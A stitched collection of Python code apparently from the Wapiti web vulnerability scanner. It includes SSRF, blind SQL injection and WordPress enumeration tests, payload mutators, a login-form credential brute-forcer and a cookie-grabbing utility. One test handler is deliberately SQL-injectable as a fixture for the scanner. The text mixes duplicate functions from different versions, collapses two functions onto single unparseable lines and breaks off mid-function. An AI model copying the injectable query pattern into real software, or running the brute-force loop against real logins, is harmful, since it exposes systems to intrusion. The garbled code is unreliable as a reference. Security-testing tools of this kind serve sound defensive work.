async def test_whole_stuff():
    # Test attacking all kinds of parameters without crashing
    respx.route(host="perdu.com").mock(return_value=httpx.Response(200, text="Hello there"))

    persister = AsyncMock()
    all_requests = []

    request = Request("http://perdu.com/")
    request.path_id = 1
    all_requests.append(request)

    request = Request("http://perdu.com/?foo=bar")
    request.path_id = 2
    all_requests.append(request)

    request = Request(
        "http://perdu.com/?foo=bar",
        post_params=[["a", "b"]],
        file_params=[["file", ("calendar.xml", "<xml>Hello there</xml", "application/xml")]]
    )
    request.path_id = 3
    all_requests.append(request)

    def get_path_by_id(request_id):
        for req in all_requests:
            if req.path_id == int(request_id):
                return req
        return None

    persister.get_path_by_id.side_effect = get_path_by_id

    crawler = AsyncCrawler("http://perdu.com/", timeout=1)
    options = {"timeout": 10, "level": 2}

    module = mod_ssrf(crawler, persister, options, Event())
    module.verbose = 2
    module.do_post = True

    respx.get("https://wapiti3.ovh/get_ssrf.php?session_id=" + module._session_id).mock(
        return_value=httpx.Response(
            200,
            json={
                "3": {
                    "66696c65": [
                        {
                            "date": "2019-08-17T16:52:41+00:00",
                            "url": "https://wapiti3.ovh/ssrf_data/yolo/3/66696c65/31337-0-192.168.2.1.txt",
                            "ip": "192.168.2.1",
                            "method": "GET"
                        }
                    ]
                }
            }
        )
    )

    for request in all_requests:
        await module.attack(request)

    assert not persister.add_payload.call_count
    # We must trigger finish() normally called by wapiti.py
    await module.finish()

    assert persister.add_payload.call_count
    assert persister.add_payload.call_args_list[0][1]["module"] == "ssrf"
    assert persister.add_payload.call_args_list[0][1]["category"] == _("Server Side Request Forgery")
    assert persister.add_payload.call_args_list[0][1]["parameter"] == "file"
    assert persister.add_payload.call_args_list[0][1]["request"].file_params == [
        ['file', ('http://external.url/page', '<xml>Hello there</xml', 'application/xml')]
    ]
    await crawler.close()
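# The "66696c65" key in the mocked endpoint response above is just the "file"
# parameter name hex-encoded, matching the hexlify()/unhexlify() round-trip the
# SSRF module performs. A minimal stdlib-only sanity check of that encoding:
from binascii import hexlify, unhexlify

def demo_hex_param_roundtrip():
    # "file" encodes to "66696c65", which is what the endpoint reports back
    assert hexlify(b"file").decode() == "66696c65"
    assert unhexlify("66696c65").decode("utf-8") == "file"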
async def attack(self, request: Request): self.finished = True request_to_root = Request(request.url) try: with open(os.path.join(self.user_config_dir, self.WAPP_DB)) as wapp_db_file: json.load(wapp_db_file) except IOError: print(_("Problem with local wapp database.")) print(_("Downloading from the web...")) await self.update() try: application_data = ApplicationData(os.path.join(self.user_config_dir, self.WAPP_DB)) except FileNotFoundError as exception: print(exception) print(_("Try using --store-session option, or update apps.json using --update option.")) return except ApplicationDataException as exception: print(exception) return try: response = await self.crawler.async_send(request_to_root, follow_redirects=True) except RequestError: self.network_errors += 1 return wappalyzer = Wappalyzer(application_data, response) detected_applications = wappalyzer.detect_with_versions_and_categories() if len(detected_applications) > 0: self.log_blue("---") for application_name in sorted(detected_applications, key=lambda x: x.lower()): versions = detected_applications[application_name]["versions"] categories = detected_applications[application_name]["categories"] self.log_blue( MSG_TECHNO_VERSIONED, application_name, versions ) await self.add_addition( category=TECHNO_DETECTED, request=request_to_root, info=json.dumps(detected_applications[application_name]) ) if versions: if "Web servers" in categories: await self.add_vuln_info( category=WEB_SERVER_VERSIONED, request=request_to_root, info=json.dumps(detected_applications[application_name]) ) else: await self.add_vuln_info( category=WEB_APP_VERSIONED, request=request_to_root, info=json.dumps(detected_applications[application_name]) )
def mutate(self, request: Request):
    get_params = request.get_params
    post_params = request.post_params
    file_params = request.file_params
    referer = request.referer

    # estimation = self.estimate_requests_count(request)
    #
    # if self._attacks_per_url_pattern[request.hash_params] + estimation > self._max_queries_per_pattern:
    #     # Otherwise (pattern already attacked), make sure we don't exceed maximum allowed
    #     return
    #
    # self._attacks_per_url_pattern[request.hash_params] += estimation

    for params_list in [get_params, post_params, file_params]:
        if params_list is get_params and not self._mutate_get:
            continue

        if params_list is post_params and not self._mutate_post:
            continue

        if params_list is file_params and not self._mutate_file:
            continue

        for i in range(len(params_list)):
            param_name = quote(params_list[i][0])

            if self._skip_list and param_name in self._skip_list:
                continue

            if self._parameters and param_name not in self._parameters:
                continue

            saved_value = params_list[i][1]
            if saved_value is None:
                saved_value = ""

            if params_list is file_params:
                params_list[i][1] = ["__PAYLOAD__", params_list[i][1][1]]
            else:
                params_list[i][1] = "__PAYLOAD__"

            attack_pattern = Request(
                request.path,
                method=request.method,
                get_params=get_params,
                post_params=post_params,
                file_params=file_params
            )

            if hash(attack_pattern) not in self._attack_hashes:
                self._attack_hashes.add(hash(attack_pattern))

                for payload, original_flags in self.iter_payloads():
                    if ("[FILE_NAME]" in payload or "[FILE_NOEXT]" in payload) and not request.file_name:
                        continue

                    # no quoting: send() will do it for us
                    payload = payload.replace("[FILE_NAME]", request.file_name)
                    payload = payload.replace("[FILE_NOEXT]", splitext(request.file_name)[0])

                    if isinstance(request.path_id, int):
                        payload = payload.replace("[PATH_ID]", str(request.path_id))

                    payload = payload.replace(
                        "[PARAM_AS_HEX]",
                        hexlify(param_name.encode("utf-8", errors="replace")).decode()
                    )

                    if params_list is file_params:
                        if "[EXTVALUE]" in payload:
                            if "." not in saved_value[0][:-1]:
                                # Nothing that looks like an extension, skip the payload
                                continue

                            payload = payload.replace("[EXTVALUE]", saved_value[0].rsplit(".", 1)[-1])

                        payload = payload.replace("[VALUE]", saved_value[0])
                        payload = payload.replace("[DIRVALUE]", saved_value[0].rsplit('/', 1)[0])
                        params_list[i][1][0] = payload
                        method = PayloadType.file
                    else:
                        if "[EXTVALUE]" in payload:
                            if "." not in saved_value[:-1]:
                                # Nothing that looks like an extension, skip the payload
                                continue

                            payload = payload.replace("[EXTVALUE]", saved_value.rsplit(".", 1)[-1])

                        payload = payload.replace("[VALUE]", saved_value)
                        payload = payload.replace("[DIRVALUE]", saved_value.rsplit('/', 1)[0])
                        params_list[i][1] = payload

                        if params_list is get_params:
                            method = PayloadType.get
                        else:
                            method = PayloadType.post

                    evil_req = Request(
                        request.path,
                        method=request.method,
                        get_params=get_params,
                        post_params=post_params,
                        file_params=file_params,
                        referer=referer,
                        link_depth=request.link_depth
                    )

                    # Flags from iter_payloads should be considered as mutable (even if it's not the case)
                    # so let's copy them just to be sure we don't mess with them.
                    yield evil_req, param_name, payload, original_flags.with_method(method)

            params_list[i][1] = saved_value

    if not get_params and request.method == "GET" and self._qs_inject:
        attack_pattern = Request(
            "{}?__PAYLOAD__".format(request.path),
            method=request.method,
            referer=referer,
            link_depth=request.link_depth
        )

        if hash(attack_pattern) not in self._attack_hashes:
            self._attack_hashes.add(hash(attack_pattern))

            for payload, original_flags in self.iter_payloads():
                # Ignore payloads reusing existing parameter values
                if "[VALUE]" in payload:
                    continue

                if "[DIRVALUE]" in payload:
                    continue

                if ("[FILE_NAME]" in payload or "[FILE_NOEXT]" in payload) and not request.file_name:
                    continue

                payload = payload.replace("[FILE_NAME]", request.file_name)
                payload = payload.replace("[FILE_NOEXT]", splitext(request.file_name)[0])

                if isinstance(request.path_id, int):
                    payload = payload.replace("[PATH_ID]", str(request.path_id))

                payload = payload.replace("[PARAM_AS_HEX]", hexlify(b"QUERY_STRING").decode())

                evil_req = Request(
                    "{}?{}".format(request.path, quote(payload)),
                    method=request.method,
                    referer=referer,
                    link_depth=request.link_depth
                )

                yield evil_req, "QUERY_STRING", payload, original_flags.with_method(PayloadType.get)
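# A minimal sketch of how callers consume mutate(): each yielded item is a
# 4-tuple (mutated request, parameter name, injected payload, flags), as seen
# in the SSRF module's finish() below. Mutator, Request and Flags are names
# from this codebase; the payload list here is made up for illustration.
def demo_mutator_usage():
    request = Request("http://perdu.com/page.php?foo=bar")
    mutator = Mutator(payloads=[("__INJECT__", Flags())])
    for evil_request, parameter, payload, flags in mutator.mutate(request):
        print(parameter, payload, evil_request)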
def finish(self):
    endpoint_url = "{}get_ssrf.php?id={}".format(self.internal_endpoint, self._session_id)
    print(_("[*] Asking endpoint URL {} for results, please wait...").format(endpoint_url))
    sleep(2)
    # Once the attacks are over, question the endpoint to see whether it was contacted
    endpoint_request = Request(endpoint_url)
    try:
        response = self.crawler.send(endpoint_request)
    except RequestException:
        print(_("[!] Unable to request endpoint URL '{}'").format(self.internal_endpoint))
    else:
        data = response.json
        if isinstance(data, dict):
            for request_id in data:
                original_request = self.persister.get_path_by_id(request_id)
                if original_request is None:
                    raise ValueError("Could not find the original request with that ID")

                page = original_request.path
                for hex_param in data[request_id]:
                    parameter = unhexlify(hex_param).decode("utf-8")

                    for infos in data[request_id][hex_param]:
                        request_url = infos["url"]
                        # Date in ISO format
                        request_date = infos["date"]
                        request_ip = infos["ip"]
                        request_method = infos["method"]
                        # request_size = infos["size"]

                        if parameter == "QUERY_STRING":
                            vuln_message = Vulnerability.MSG_QS_INJECT.format(self.MSG_VULN, page)
                        else:
                            vuln_message = _(
                                "{0} via injection in the parameter {1}.\n"
                                "The target performed an outgoing HTTP {2} request at {3} with IP {4}.\n"
                                "Full request can be seen at {5}"
                            ).format(
                                self.MSG_VULN, parameter, request_method,
                                request_date, request_ip, request_url
                            )

                        mutator = Mutator(
                            methods="G" if original_request.method == "GET" else "PF",
                            payloads=[("http://external.url/page", set())],
                            qs_inject=self.must_attack_query_string,
                            parameters=[parameter],
                            skip=self.options.get("skipped_parameters")
                        )

                        mutated_request, __, __, __ = next(mutator.mutate(original_request))

                        self.add_vuln(
                            request_id=original_request.path_id,
                            category=Vulnerability.SSRF,
                            level=Vulnerability.HIGH_LEVEL,
                            request=mutated_request,
                            info=vuln_message,
                            parameter=parameter
                        )

                        self.log_red("---")
                        self.log_red(
                            Vulnerability.MSG_QS_INJECT if parameter == "QUERY_STRING"
                            else Vulnerability.MSG_PARAM_INJECT,
                            self.MSG_VULN,
                            page,
                            parameter
                        )
                        self.log_red(Vulnerability.MSG_EVIL_REQUEST)
                        self.log_red(mutated_request.http_repr())
                        self.log_red("---")
async def attack(self, request: Request):
    try:
        page = await self.crawler.async_get(Request(request.referer), follow_redirects=True)
    except RequestError:
        self.network_errors += 1
        return

    login_form, username_field_idx, password_field_idx = page.find_login_form()
    if not login_form:
        return

    try:
        failure_text = await self.test_credentials(
            login_form, username_field_idx, password_field_idx, "invalid", "invalid"
        )

        if self.check_success_auth(failure_text):
            # Ignore this case as it raises false positives
            return
    except RequestError:
        self.network_errors += 1
        return

    for username, password in product(self.get_usernames(), self.get_passwords()):
        if self._stop_event.is_set():
            break

        try:
            response = await self.test_credentials(
                login_form, username_field_idx, password_field_idx, username, password
            )
        except RequestError:
            self.network_errors += 1
            continue

        if self.check_success_auth(response) and failure_text != response:
            vuln_message = _("Credentials found for URL {} : {} / {}").format(
                request.referer, username, password
            )

            # Recreate the request that succeeded in order to print and store it
            post_params = login_form.post_params
            get_params = login_form.get_params

            if login_form.method == "POST":
                post_params[username_field_idx][1] = username
                post_params[password_field_idx][1] = password
            else:
                get_params[username_field_idx][1] = username
                get_params[password_field_idx][1] = password

            evil_request = Request(
                path=login_form.url,
                method=login_form.method,
                post_params=post_params,
                get_params=get_params,
                referer=login_form.referer,
                link_depth=login_form.link_depth
            )

            await self.add_vuln_low(
                request_id=request.path_id,
                category=NAME,
                request=evil_request,
                info=vuln_message
            )

            self.log_red("---")
            self.log_red(vuln_message)
            self.log_red(Messages.MSG_EVIL_REQUEST)
            self.log_red(evil_request.http_repr())
            self.log_red("---")
            break
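# The credential loop above walks the cartesian product of the username and
# password wordlists. A tiny self-contained illustration of that iteration
# order (the wordlists below are made up):
from itertools import product

def demo_credentials_product():
    usernames = ["admin", "root"]
    passwords = ["123456", "letmein"]
    # Yields (admin, 123456), (admin, letmein), (root, 123456), (root, letmein)
    for username, password in product(usernames, passwords):
        print(username, password)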
async def test_blind_detection_parenthesis():
    with NamedTemporaryFile() as database_fd:
        conn = sqlite3.connect(database_fd.name)
        cursor = conn.cursor()
        cursor.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
        conn.commit()
        cursor.execute("INSERT INTO users (id, username, password) VALUES (1, \"admin\", \"123456\")")
        conn.commit()
        cursor.close()
        conn.close()

        def process(http_request):
            try:
                username = parse_qs(urlparse(str(http_request.url)).query)["username"][0]
            except (IndexError, KeyError):
                return httpx.Response(200, text="Unknown user")
            else:
                conn = sqlite3.connect(database_fd.name)
                cursor = conn.cursor()
                try:
                    # Will you spot the SQLi vulnerability? :D
                    cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username))
                    row = cursor.fetchone()
                except sqlite3.OperationalError:
                    cursor.close()
                    conn.close()
                    return httpx.Response(200, text="Unknown user")
                else:
                    cursor.close()
                    conn.close()
                    if row:
                        return httpx.Response(200, text="Welcome, your user ID is {}".format(row[0]))
                    else:
                        return httpx.Response(200, text="Unknown user")

        respx.get(url__regex=r"http://perdu\.com/\?username=.*").mock(side_effect=process)

        persister = AsyncMock()
        request = Request("http://perdu.com/?username=admin")
        request.path_id = 1

        crawler = AsyncCrawler("http://perdu.com/", timeout=1)
        options = {"timeout": 10, "level": 1}

        module = mod_sql(crawler, persister, options, Event())
        module.verbose = 2
        module.do_post = True
        await module.attack(request)

        assert persister.add_payload.call_count
        # This is the same test as the previous blind one, except we have to put single quotes
        assert respx.calls.call_count == 8
        await crawler.close()
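# The handler above is deliberately injectable: the username is interpolated
# straight into the SQL string, which is what mod_sql detects. For contrast,
# a minimal sketch of the safe, parameterized version (stdlib only; the
# in-memory table is made up):
import sqlite3

def demo_parameterized_lookup(username: str):
    conn = sqlite3.connect(":memory:")
    cursor = conn.cursor()
    cursor.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    cursor.execute("INSERT INTO users (id, username) VALUES (1, 'admin')")
    # Placeholders let sqlite3 quote the value, so "admin' OR '1'='1" stays inert
    cursor.execute("SELECT id FROM users WHERE username = ?", (username,))
    row = cursor.fetchone()
    conn.close()
    return row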
def test_theme():
    responses.add(
        responses.GET,
        url="http://perdu.com/",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
    )

    # Response for the versioned theme
    responses.add(
        responses.GET,
        url="http://perdu.com/wp-content/themes/twentynineteen/readme.txt",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        Stable tag: 1.9 \
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
    )

    # Response for a theme detected without version (403 forbidden response)
    responses.add(
        responses.GET,
        url="http://perdu.com/wp-content/themes/seedlet/readme.txt",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        Stable tag: 5.4 \
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>",
        status=403
    )

    # Response for a badly formatted readme.txt of a theme
    responses.add(
        responses.GET,
        url="http://perdu.com/wp-content/themes/customify/readme.txt",
        body="<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \
        <h2>Pas de panique, on va wordpress vous aider</h2> \
        Wordpress wordpress WordPress\
        Version Tested : 3.2 \
        <strong><pre> * <----- vous êtes ici</pre></strong></body></html>"
    )

    responses.add(
        responses.GET,
        url=re.compile(r"http://perdu.com/wp-content/plugins/.*?/readme.txt"),
        status=404
    )

    responses.add(
        responses.GET,
        url=re.compile(r"http://perdu.com/wp-content/themes/.*?/readme.txt"),
        status=404
    )

    persister = FakePersister()
    request = Request("http://perdu.com")
    request.path_id = 1
    crawler = Crawler("http://perdu.com")
    options = {"timeout": 10, "level": 2}
    logger = Mock()

    module = mod_wp_enum(crawler, persister, logger, options)
    module.verbose = 2
    module.attack(request)

    assert persister.additionals
    assert persister.additionals[0] == '{"name": "twentynineteen", "versions": ["1.9"], "categories": ["WordPress themes"]}'
    assert persister.additionals[1] == '{"name": "seedlet", "versions": [""], "categories": ["WordPress themes"]}'
    assert persister.additionals[2] == '{"name": "customify", "versions": [""], "categories": ["WordPress themes"]}'
async def test_resume_crawling():
    stop_event = Event()

    def process(http_request):
        try:
            page = int(parse_qs(urlparse(str(http_request.url)).query)["page"][0])
        except (IndexError, KeyError, ValueError):
            return httpx.Response(200, text="Invalid value")

        if page == 10:
            stop_event.set()

        if page > 20:
            return httpx.Response(200, text="")

        body = "<html><body>"
        body += "<a href='http://perdu.com/?page={0}'>{0}</a>\n".format(page + 1)
        body += "<a href='http://perdu.com/?page={0}'>{0}</a>\n".format(page + 2)
        return httpx.Response(200, text=body)

    respx.get(url__regex=r"http://perdu\.com/$").mock(
        return_value=httpx.Response(200, text="<html><body><a href='http://perdu.com/?page=0'>0</a>")
    )

    respx.get(url__regex=r"http://perdu\.com/\?page=\d+").mock(side_effect=process)

    # Mock HTTP 404 behavior check
    respx.get(url__regex=r"http://perdu\.com/z.*\.html$").mock(return_value=httpx.Response(404))

    temp_obj = TemporaryDirectory()
    wapiti = Wapiti(Request("http://perdu.com/"), session_dir=temp_obj.name)
    await wapiti.init_persister()
    await wapiti.load_scan_state()
    await wapiti.browse(stop_event, parallelism=1)
    await wapiti.save_scan_state()

    remaining_requests = set([request async for request in wapiti.persister.get_to_browse()])
    # Got root url + pages 0 to 9
    all_requests = set([request async for request in wapiti.persister.get_links()])
    remaining_urls = {request.url for request in remaining_requests - all_requests}

    # Page 10 stops the crawling but gives links to pages 11 and 12, so those are the remaining urls
    assert remaining_urls == {"http://perdu.com/?page=11", "http://perdu.com/?page=12"}

    await wapiti.crawler.close()

    wapiti = Wapiti(Request("http://perdu.com/"), session_dir=temp_obj.name)
    await wapiti.init_persister()
    await wapiti.load_scan_state()
    await wapiti.browse(stop_event)
    await wapiti.save_scan_state()

    remaining_requests = set([request async for request in wapiti.persister.get_to_browse()])
    all_requests = set([request async for request in wapiti.persister.get_links()])

    # We stop giving new links at page > 20 but page 20 still links to pages 21 and 22,
    # so we have 23 paginated pages (0 to 22) plus the root url, i.e. 24 requests
    assert len(all_requests) == 24

    # We are done as we scanned all the pages
    assert not remaining_requests - all_requests
    rmtree(temp_obj.name)
    await wapiti.crawler.close()
def getcookie_main():
    parser = argparse.ArgumentParser(description="Wapiti-getcookie: A utility to grab cookies from a webpage")
    parser.add_argument('-u', '--url', help='First page to fetch for cookies', required=True)
    parser.add_argument('-c', '--cookie', help='Cookie file in Wapiti JSON format where cookies will be stored', required=True)
    parser.add_argument('-p', '--proxy', help='Address of the proxy server to use')
    parser.add_argument("--tor", action="store_true", help=_("Use Tor listener (127.0.0.1:9050)"))
    parser.add_argument(
        "-a", "--auth-cred",
        dest="credentials",
        default=argparse.SUPPRESS,
        help=_("Set HTTP authentication credentials"),
        metavar="CREDENTIALS"
    )
    parser.add_argument(
        "--auth-type",
        default=argparse.SUPPRESS,
        help=_("Set the authentication type to use"),
        choices=["basic", "digest", "kerberos", "ntlm"]
    )
    parser.add_argument('-d', '--data', help='Data to send to the form with POST')
    parser.add_argument(
        "-A", "--user-agent",
        default=argparse.SUPPRESS,
        help=_("Set a custom user-agent to use for every request"),
        metavar="AGENT",
        dest="user_agent"
    )
    parser.add_argument(
        "-H", "--header",
        action="append",
        default=[],
        help=_("Set a custom header to use for every request"),
        metavar="HEADER",
        dest="headers"
    )

    args = parser.parse_args()

    parts = urlparse(args.url)
    if not parts.scheme or not parts.netloc or not parts.path:
        print(_("Invalid base URL was specified, please give a complete URL with protocol scheme"
                " and slash after the domain name."))
        exit()

    server = parts.netloc
    base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', ''))

    crawler = Crawler(base)

    if args.proxy:
        proxy_parts = urlparse(args.proxy)
        if proxy_parts.scheme and proxy_parts.netloc:
            if proxy_parts.scheme.lower() in ("http", "https", "socks"):
                crawler.set_proxy(args.proxy)

    if args.tor:
        crawler.set_proxy("socks://127.0.0.1:9050/")

    if "user_agent" in args:
        crawler.add_custom_header("user-agent", args.user_agent)

    if "credentials" in args:
        if "%" in args.credentials:
            crawler.credentials = args.credentials.split("%", 1)
        else:
            raise InvalidOptionValue("-a", args.credentials)

    if "auth_type" in args:
        crawler.auth_method = args.auth_type

    for custom_header in args.headers:
        if ":" in custom_header:
            hdr_name, hdr_value = custom_header.split(":", 1)
            crawler.add_custom_header(hdr_name.strip(), hdr_value.strip())

    # Open or create the cookie file and delete previous cookies from this server
    json_cookie = jsoncookie.JsonCookie()
    json_cookie.open(args.cookie)
    json_cookie.delete(server)

    # A first crawl is sometimes necessary, so let's fetch the webpage
    page = crawler.get(Request(args.url), follow_redirects=True)
    json_cookie.addcookies(crawler.session_cookies)

    if not args.data:
        # No data specified, try interactive mode by fetching forms
        forms = []
        for i, form in enumerate(page.iter_forms(autofill=False)):
            if i == 0:
                print('')
                print(_("Choose the form you want to use or enter 'q' to leave :"))
            print("{0}) {1}".format(i, form))
            forms.append(form)

        valid_choice_done = False
        if forms:
            nchoice = -1
            print('')
            while not valid_choice_done:
                choice = input(_("Enter a number : "))
                if choice.isdigit():
                    nchoice = int(choice)
                    if len(forms) > nchoice >= 0:
                        valid_choice_done = True
                elif choice == 'q':
                    break

            if valid_choice_done:
                form = forms[nchoice]
                print('')
                print(_("Please enter values for the following form: "))
                print(_("url = {0}").format(form.url))

                post_params = form.post_params
                for i, post_param_tuple in enumerate(post_params):
                    field, value = post_param_tuple
                    if value:
                        new_value = input(field + " (" + value + ") : ")
                    else:
                        new_value = input("{}: ".format(field))

                    post_params[i] = [field, new_value]

                request = Request(form.url, post_params=post_params)
                crawler.send(request, follow_redirects=True)
                json_cookie.addcookies(crawler.session_cookies)
    else:
        request = Request(args.url, post_params=args.data)
        crawler.send(request, follow_redirects=True)
        json_cookie.addcookies(crawler.session_cookies)

    json_cookie.dump()
    json_cookie.close()
def mutate(self, request: Request):
    get_params = request.get_params
    post_params = request.post_params
    file_params = request.file_params
    referer = request.referer

    # estimation = self.estimate_requests_count(request)
    #
    # if self._attacks_per_url_pattern[request.hash_params] + estimation > self._max_queries_per_pattern:
    #     # Otherwise (pattern already attacked), make sure we don't exceed maximum allowed
    #     return
    #
    # self._attacks_per_url_pattern[request.hash_params] += estimation

    for params_list in [get_params, post_params, file_params]:
        for i in range(len(params_list)):
            param_name = quote(params_list[i][0])

            if self._skip_list and param_name in self._skip_list:
                continue

            if self._parameters and param_name not in self._parameters:
                continue

            saved_value = params_list[i][1]
            if saved_value is None:
                saved_value = ""

            if params_list is file_params:
                params_list[i][1] = ["__PAYLOAD__", params_list[i][1][1]]
            else:
                params_list[i][1] = "__PAYLOAD__"

            attack_pattern = Request(
                request.path,
                method=request.method,
                get_params=get_params,
                post_params=post_params,
                file_params=file_params
            )

            if hash(attack_pattern) not in self._attack_hashes:
                self._attack_hashes.add(hash(attack_pattern))

                for payload, original_flags in self.iter_payloads():
                    # no quoting: send() will do it for us
                    payload = payload.replace("[FILE_NAME]", request.file_name)
                    payload = payload.replace("[FILE_NOEXT]", splitext(request.file_name)[0])

                    # Flags from iter_payloads should be considered as mutable (even if it's not the case)
                    # so let's copy them just to be sure we don't mess with them.
                    flags = set(original_flags)

                    if params_list is file_params:
                        payload = payload.replace("[VALUE]", saved_value[0])
                        payload = payload.replace("[DIRVALUE]", saved_value[0].rsplit('/', 1)[0])
                        params_list[i][1][0] = payload
                        flags.add(PayloadType.file)
                    else:
                        payload = payload.replace("[VALUE]", saved_value)
                        payload = payload.replace("[DIRVALUE]", saved_value.rsplit('/', 1)[0])
                        params_list[i][1] = payload

                        if params_list is get_params:
                            flags.add(PayloadType.get)
                        else:
                            flags.add(PayloadType.post)

                    evil_req = Request(
                        request.path,
                        method=request.method,
                        get_params=get_params,
                        post_params=post_params,
                        file_params=file_params,
                        referer=referer,
                        link_depth=request.link_depth
                    )

                    yield evil_req, param_name, payload, flags

            params_list[i][1] = saved_value

    if not get_params and request.method == "GET" and self._qs_inject:
        attack_pattern = Request(
            "{}?__PAYLOAD__".format(request.path),
            method=request.method,
            referer=referer,
            link_depth=request.link_depth
        )

        if hash(attack_pattern) not in self._attack_hashes:
            self._attack_hashes.add(hash(attack_pattern))

            for payload, original_flags in self.iter_payloads():
                # Ignore payloads reusing existing parameter values
                if "[VALUE]" in payload:
                    continue

                if "[DIRVALUE]" in payload:
                    continue

                payload = payload.replace("[FILE_NAME]", request.file_name)
                payload = payload.replace("[FILE_NOEXT]", splitext(request.file_name)[0])
                flags = set(original_flags)

                evil_req = Request(
                    "{}?{}".format(request.path, quote(payload)),
                    method=request.method,
                    referer=referer,
                    link_depth=request.link_depth
                )

                flags.add(PayloadType.get)
                yield evil_req, "QUERY_STRING", payload, flags
def test_whole_stuff():
    # Test attacking all kinds of parameters without crashing
    responses.add(
        responses.GET,
        url="http://perdu.com/",
        body="Hello there"
    )

    persister = FakePersister()

    request = Request("http://perdu.com/")
    request.path_id = 1
    persister.requests.append(request)

    request = Request("http://perdu.com/?foo=bar")
    request.path_id = 2
    persister.requests.append(request)

    request = Request(
        "http://perdu.com/?foo=bar",
        post_params=[["a", "b"]],
        file_params=[["file", ["calendar.xml", "<xml>Hello there</xml"]]]
    )
    request.path_id = 3
    persister.requests.append(request)

    crawler = Crawler("http://perdu.com/", timeout=1)
    options = {"timeout": 10, "level": 2}
    logger = Mock()

    module = mod_ssrf(crawler, persister, logger, options)
    module.verbose = 2
    module.do_post = True

    responses.add(
        responses.GET,
        url="https://wapiti3.ovh/get_ssrf.php?id=" + module._session_id,
        json={
            "3": {
                "66696c65": [
                    {
                        "date": "2019-08-17T16:52:41+00:00",
                        "url": "https://wapiti3.ovh/ssrf_data/yolo/3/66696c65/31337-0-192.168.2.1.txt",
                        "ip": "192.168.2.1",
                        "method": "GET"
                    }
                ]
            }
        }
    )

    for request in persister.requests:
        module.attack(request)

    assert not persister.vulnerabilities

    # We must trigger finish() normally called by wapiti.py
    module.finish()

    assert persister.vulnerabilities
    assert persister.vulnerabilities[0][0] == "file"
    file_params = persister.vulnerabilities[0][1].file_params
    assert file_params[0][1][0] == "http://external.url/page"
def test_mutations(): req = Request("http://perdu.com/page.php", method="POST", get_params=[["p", "login.php"]], post_params=[["user", "admin"], ["password", "letmein"]], file_params=[["file", ("pix.gif", "GIF89a", "image/gif")]]) mutator = Mutator(payloads=[("INJECT", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 4 mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 12 mutator = Mutator(methods="G", payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 3 mutator = Mutator(methods="P", payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 6 mutator = Mutator(methods="PF", payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 9 mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())], parameters=["user", "file"]) count = 0 for __ in mutator.mutate(req): count += 1 assert count == 6 mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags()), ("PAYLOAD_3", Flags())], skip={"p"}) count = 0 for __, __, __, __ in mutator.mutate(req): count += 1 assert count == 9 # JSESSIONID is marked as annoying parameter req2 = Request("http://perdu.com/page.php", method="POST", get_params=[["JSESSIONID", "deadbeef"]], post_params=[["user", "admin"], ["password", "letmein"]], file_params=[["file", ("pix.gif", "GIF89a", "image/gif")]]) mutator = Mutator(payloads=[("INJECT", Flags())]) count = 0 for __ in mutator.mutate(req2): count += 1 assert count == 3 # Inject into query string. Will only work if method is GET without any parameter req3 = Request("http://perdu.com/page.php") mutator = Mutator(payloads=[("PAYLOAD_1", Flags()), ("PAYLOAD_2", Flags())], qs_inject=True) count = 0 for __, __, __, __ in mutator.mutate(req3): count += 1 assert count == 2
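# Sanity-checking the arithmetic in test_mutations() above: req exposes four
# injection points (1 GET + 2 POST + 1 file parameter), so the expected count
# is payload_count * injection_points for the selected methods. A small
# stdlib-only sketch of that bookkeeping:
def demo_mutation_counts():
    injection_points = {"G": 1, "P": 2, "F": 1}
    assert sum(injection_points.values()) * 1 == 4    # one payload, all methods
    assert sum(injection_points.values()) * 3 == 12   # three payloads, all methods
    assert injection_points["G"] * 3 == 3             # methods="G"
    assert injection_points["P"] * 3 == 6             # methods="P"
    assert (injection_points["P"] + injection_points["F"]) * 3 == 9  # methods="PF"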
def test_blind_detection_parenthesis():
    with NamedTemporaryFile() as database_fd:
        conn = sqlite3.connect(database_fd.name)
        cursor = conn.cursor()
        cursor.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
        conn.commit()
        cursor.execute("INSERT INTO users (id, username, password) VALUES (1, \"admin\", \"123456\")")
        conn.commit()
        cursor.close()
        conn.close()

        def process(http_request):
            try:
                username = parse_qs(urlparse(http_request.url).query)["username"][0]
            except (IndexError, KeyError):
                return 200, {}, "Unknown user"
            else:
                conn = sqlite3.connect(database_fd.name)
                cursor = conn.cursor()
                try:
                    # Will you spot the SQLi vulnerability? :D
                    cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username))
                    row = cursor.fetchone()
                except sqlite3.OperationalError:
                    cursor.close()
